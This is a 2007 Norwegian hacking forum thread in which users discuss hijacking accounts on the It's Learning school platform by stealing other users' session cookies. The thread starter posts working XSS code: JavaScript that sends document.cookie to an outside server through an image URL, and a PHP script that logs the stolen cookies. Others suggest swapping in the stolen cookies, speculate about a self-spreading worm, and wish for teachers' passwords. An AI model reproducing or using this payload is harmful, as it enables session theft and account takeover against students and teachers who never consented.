Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
AbonnerSkjul
Host1.no - Webhotell fra 29,-, virtuell server fra 249,-. 15% rabatt med rabattkode "nFF". Besøk oss på Host1.no!
  7 1771
Ozma
55535 HP
Ozma's Avatar
3.680 1.125
11. januar 2007
Jeg har funnet en måte å grabbe cookiene til personer som klikker på en link i meldinger jeg sender. Det jeg lurer på er: Hvordan kan jeg bruke disse til å logge på kontoen?

Eksempel på en cookie:

Kode

login=CustomerId=293&LanguageId=0&ssl=True; sModule=digexguid=25b3f3d5-3214-1475-a54b-e4769e6b4e27&itsguid=73d2d561-bed9-12b2-5575-5da0ea289798&aiccguid=77b4e3d5-7021-4874-b90e-e5769a8b4e19&pool=a_cust; ASP.NET_SessionId=ydiqif233wz3j245gj0szkfj
(Har byttet ut tallene)

Hvordan kan jeg bytte ut mine cookies med det her?

Fant også en måte å kjøre aspx kode på, men jeg greide bare å kjøre skriptet en gang før jeg fikk 403 forbidden ("Kan ikke kjøre kode i denne mappen elns"). Uheldigvis var det bare en "Hello World!" kode :/
robhol
NOOOOOOOOOOOOOOOOOO-
robhol's Avatar
6.431 5.676
11. januar 2007
Hvis det er et passord i cookie'ne er det antagelig enten kryptert eller hashet. Datautviklere er ikke helt grønne.
Torstein
104 2
12. januar 2007
Gå inn på http://lfh.heideri.ch/ og legg installasjonen til som et bokmerke. Bruk den når du er inne på its learning og endre kakebiten din.

It's Learning ble forøvrig nettopp sikret mot et annet xss-hull. Har du lyst å dele det nye?
Ozma
55535 HP
Ozma's Avatar
Trådstarter
3.680 1.125
12. januar 2007
Det er veldig enkelt egentlig...
I "Mine Filer" -> "Web" kan du ha et javascript som henter cookie og sender den til et php script ved hjelp av et bilde eller iframe.

Koden på siden:

Kode

<script>
s = new String(document.cookie);
s = s.replace(/&/g, "å");
document.write('<img src="http://xxx.59.132.186/~xxxxxxx/cookie.php?data=' + s + '">');
</script>
Bildet:

Kode

<?php
$cookie =& $_GET['data'];
$cookie = str_replace('å', '&', $cookie);
$writer = new fileWriter( 'itslearning.txt' );
$writer->writeLine( '---------------------------------' );
$writer->writeLine( $cookie );

class fileWriter

{

    

    var $fileHandler;



    function fileWriter( $file )

    {

        $this->open( $file );

    }

    

    function open( $file )

    {

        $this->fileHandler = fopen( $file, 'a' );

    }

    

    function writeLine( $line )

    {

        fwrite( $this->fileHandler, $line . "\r\n" );

    }



}

$im = imagecreatefromjpeg('images/1165940949305.jpg');
header('Content-Type:image/jpeg');
imagepng($im);

?>
Jeg brukte Tamper Data til å teste om det virket. Det gjorde det ikke... Sessions er forbundet med IPer i ASP sant?

Jeg greide bare å finne ut hvilken kommune/fylke/skole de som har cookien kommer ifra.

Edit: fileWriter classen er laget av en på forumet. Husker ikke hvem det var.
Torstein
104 2
12. januar 2007
OK... Jeg trodde du hadde funnet noe nytt. :P Har egentlig ikke tenkt over at det går an å utnytte det slik. Men dette er definitivt et problem. Det er trolig mulig å lage javascript som sender nye meldinger med et link til scriptet. Og så har du plutslig en orm :S


Problemet ditt kan være at sessionen er utgått / expired.
Exmagician
1.227 857
13. januar 2007
Skjedd noe mer her? Prøvd litt diverse saker jeg, men klarer ikke noe spesielt.
Ozma
55535 HP
Ozma's Avatar
Trådstarter
3.680 1.125
13. januar 2007
Du kan hvertfall logge folk ut ved å slette cookiene deres. Ikke akkurat så nyttig da :P
Hater_mordin
Fenger på sikt
1.131 904
14. januar 2007
hadde digga meg å få passordende til lærerne liksom:P